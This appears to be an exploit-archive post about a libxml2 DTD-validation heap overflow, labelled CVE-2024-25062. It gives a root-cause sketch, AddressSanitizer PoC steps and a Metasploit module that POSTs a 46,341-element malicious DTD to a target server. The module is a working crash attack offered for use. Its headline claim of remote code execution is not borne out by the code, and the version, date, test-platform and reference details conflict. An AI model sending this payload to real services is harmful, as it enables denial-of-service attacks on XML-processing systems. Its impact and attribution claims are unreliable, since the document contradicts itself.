libxml2 2.9.14 Remote Code Execution

libxml2 2.9.14 Remote Code Execution

=============================================================================================================================================
| # Title libxml2 2.9.14 Remote Code Execution

=============================================================================================================================================
| # Title : libxml2 2.9.14 (2022) RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://gitlab.gnome.org/GNOME/libxml2 |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/207181/ & CVE-2024-25062

[+] Summary :

A heap buffer overflow vulnerability exists in the xmlRegEpxFromParse function within xmlregexp.c.
The issue occurs during the compilation of regular expressions for DTD validation when processing content models with excessive elements.

[+] Root Cause Analysis :

// Vulnerable code in xmlRegEpxFromParse
transitions = xmlRegCalloc2(nbstates + 1, nbatoms + 1, sizeof(int));

for (i = 0; i < ret->nbStates; i++) {
for (j = 0; j < state->nbTrans; j++) {
// INTEGER OVERFLOW OCCURS HERE
prev = transitions[stateno * (nbatoms + 1) + atomno + 1];
transitions[stateno * (nbatoms + 1) + atomno + 1] = targetno + 1;
}
}

[+] Vulnerability Mechanism :

Large DTD Input : Content model with ?46,341 elements
64-bit Allocation : Successful allocation of 2GB+ memory block
32-bit Indexing : Integer overflow in index calculation
Negative Indices : Array access with large negative offsets
Heap Corruption : Out-of-bounds read/write operations

[+] Impact Assessment : Confirmed Impacts

Denial of Service : Segmentation fault and application crash
Memory Corruption : Heap structure damage
Information Disclosure : Potential memory content leakage

[+] Potential Impacts (Theoretical)

Remote Code Execution : Under specific conditions
Privilege Escalation : In setuid binaries or services
Arbitrary Code Execution : With additional exploitation techniques

[+] Proof of Concept

# 1. Build vulnerable libxml2
CFLAGS="-fsanitize=address -g" ./configure && make

# 2. Generate malicious XML
python3 poc.py

# 3. Trigger vulnerability
./xmllint --valid poc_46341.xml

[+] PoC Output

==ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 4 at 0x60b000000110 thread T0
#0 in xmlRegEpxFromParse (xmlregexp.c:657)

[+] Affected Systems :

Applications : Any software using libxml2 for DTD validation
Services : XML-RPC, SOAP, document processing services
Tools : xmllint, XML parsers in various languages

[+] Common Integration Points :

Web browsers with XML support
Office document processors
Development tools and IDEs
Network services processing XML


[+] POC :

##
# Metasploit module for libxml2 RCE attempt
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'libxml2 Heap Overflow RCE',
'Description' => %q{
Attempts to exploit libxml2 integer overflow for RCE
through malicious DTD processing
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'References' => [
['CVE', 'CVE-2024-25062'],
['URL', 'https://gitlab.gnome.org/GNOME/libxml2/-/issues/XXX']
],
'DefaultOptions' => {
'SSL' => false,
'RPORT' => 80
},
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Payload' => {
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x22\x27",
'StackAdjustment' => -3500,
},
'Targets' => [
['Automatic', {}],
['Linux x86', { 'Arch' => ARCH_X86 }],
['Linux x64', { 'Arch' => ARCH_X64 }]
],
'DisclosureDate' => '2024-01-01',
'DefaultTarget' => 0))
end

def create_malicious_xml
num_elements = 46341
elements = (0...num_elements).map { |i| "el#{i}" }
content_model = elements.join(',')

xml = %Q{
<?xml version="1.0"?>
<!DOCTYPE root [
<!ELEMENT root (#{content_model})>
#{elements.map { |el| "<!ELEMENT #{el} EMPTY>" }.join("\n")}
]>
<root/>
}

return xml
end

def exploit
print_status("Generating malicious XML payload...")

malicious_xml = create_malicious_xml

print_status("Sending exploit to target...")

# Send as multipart/form-data or in POST body
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/xml',
'data' => malicious_xml
}, 25)

if res && res.code == 200
print_status("Target responded - checking for code execution...")
else
print_status("No response - target may have crashed")
end

handler
end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================